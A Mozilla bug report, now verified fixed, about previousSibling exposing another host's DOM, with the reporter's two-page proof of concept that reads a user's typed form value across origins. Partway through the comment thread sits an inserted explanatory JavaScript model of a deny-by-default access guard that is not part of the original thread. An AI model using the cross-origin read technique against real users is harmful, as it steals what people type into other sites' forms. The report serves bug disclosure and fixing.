previousSibling vulnerability

Status: VERIFIED FIXED
Product: Core
Component: Security
Priority: P3
Severity: normal
Reported: 19 years ago
Last modified: 11 years ago
Reporter: joro
Assigned to: Norris Boyd
Version: Trunk
Hardware: x86
OS: Windows 95
Bug Flags: in-testsuite ?

Description (Reporter, 19 years ago)
previousSibling is exposed in the images array. This allows access to parts of
the DOM of a document from another host. Especially bad is accessing the forms
array by using images[x].previousSibling.

The code is:
------------------------read3.html-----------------------------------
<HTML>
<HEAD><TITLE>Images 2</TITLE>
</HEAD>
Type something in the INPUT element in the other window, then
<SCRIPT>
a=window.open("http://lists.nat.bg/~joro/mozilla/links2.html");
function f()
{
alert("The value is:"+a.document.images[1].previousSibling.previousSibling.elements[0].value);
}
</SCRIPT>
<A HREF="javascript:f()">click here to get it</A>
</HTML>
---------------------------------------------------------------------

------------------links2.html (on another web server)---------------
<HTML>
<IMG SRC="ball.gif">
<FORM NAME="f" ACTION="#">
<INPUT TYPE="TEXT">
<INPUT TYPE="SUBMIT">
</FORM>
<IMG SRC="ball.gif">
</HTML>
---------------------------------------------------------------------
(Assignee) Updated 19 years ago
Status: NEW → ASSIGNED

(Assignee) Updated 19 years ago
Status: ASSIGNED → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → FIXED

(Assignee) Comment 1, 19 years ago
This should have been checked by the default preferences, but the mechanism got
skewed. Hopefully the changes I've committed will make it harder for this to
happen in the future.

Until this change hits, however, all DOM property access must be considered broken.
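
The comment above describes the access check that should have stopped this: a per-property gate in front of every DOM read from another window, defaulting to deny. The following is an added example, not code from this bug or from Mozilla, that models that gate in plain JavaScript: the origin comparison, a deliberately tiny allow-list (an assumption, not the browser's real list), and a wrapper that re-applies the check to every object reached through a permitted read, which is the property that closes off a walk such as the reporter's images[1].previousSibling chain. The document structure and the second host (other.example) are constructed stand-ins for links2.html.

```javascript
// Added example; not code from this bug or from Mozilla. A miniature model of
// the check that should run in front of every DOM property read coming from
// another window: same origin (scheme + host + port) or an explicit allow-list,
// with everything else denied by default.

function sameOrigin(urlA, urlB) {
  // URL.origin lower-cases the scheme and host and drops default ports for us.
  return new URL(urlA).origin === new URL(urlB).origin;
}

// Assumed, deliberately tiny allow-list of properties a cross-origin script may
// read. Because it is an allow-list, a property nobody thought about (such as
// previousSibling in the report above) stays closed unless opened on purpose.
const CROSS_ORIGIN_READABLE = new Set(["location", "closed"]);

// Wrap an object owned by the document at ownerUrl so that reads performed by a
// script running at callerUrl are checked. Any object reached through a permitted
// read is wrapped in turn, so the check cannot be escaped by walking the tree.
function guard(obj, ownerUrl, callerUrl) {
  return new Proxy(obj, {
    get(target, prop) {
      const name = String(prop);
      if (!sameOrigin(ownerUrl, callerUrl) && !CROSS_ORIGIN_READABLE.has(name)) {
        throw new Error(`SecurityError: ${callerUrl} may not read ${name} of ${ownerUrl}`);
      }
      const value = Reflect.get(target, prop);
      return value !== null && typeof value === "object"
        ? guard(value, ownerUrl, callerUrl)
        : value;
    },
  });
}

// Constructed stand-in for links2.html: the second image's previousSibling chain
// (through the whitespace text node) reaches the form and its text input.
const LINKS2_URL = "http://lists.nat.bg/~joro/mozilla/links2.html";

function buildLinks2Document() {
  const input = { nodeName: "INPUT", value: "what the user typed" };
  const form = { nodeName: "FORM", elements: [input] };
  const textNode = { nodeName: "#text", previousSibling: form };
  const img1 = { nodeName: "IMG", previousSibling: textNode };
  const img0 = { nodeName: "IMG", previousSibling: null };
  return { location: LINKS2_URL, images: [img0, img1] };
}

// The property walk from the report, written as a dotted path.
const REPORT_PATH = "images.1.previousSibling.previousSibling.elements.0.value";

// Read a dotted path through the guard on behalf of a script at callerUrl.
// Returns { ok: true, value } or { ok: false, error }.
function readPath(callerUrl, path) {
  let cur = guard(buildLinks2Document(), LINKS2_URL, callerUrl);
  try {
    for (const step of path.split(".")) cur = cur[step];
    return { ok: true, value: cur };
  } catch (e) {
    return { ok: false, error: e.message };
  }
}

// Same host as links2.html: the walk succeeds.
console.log(readPath("http://lists.nat.bg/~joro/mozilla/read3.html", REPORT_PATH));
// Different host (constructed): denied at the very first step, "images".
console.log(readPath("http://other.example/read3.html", REPORT_PATH));
```

The point of wrapping each intermediate object rather than only the top-level document is that a check applied once at the entry point is exactly what a newly exposed navigation property slips past; applying it on every read makes the allow-list the single place that decides what crosses the origin boundary.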

Comment 2, 19 years ago
Verified fixed.
Status: RESOLVED → VERIFIED

Comment 3, 19 years ago
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?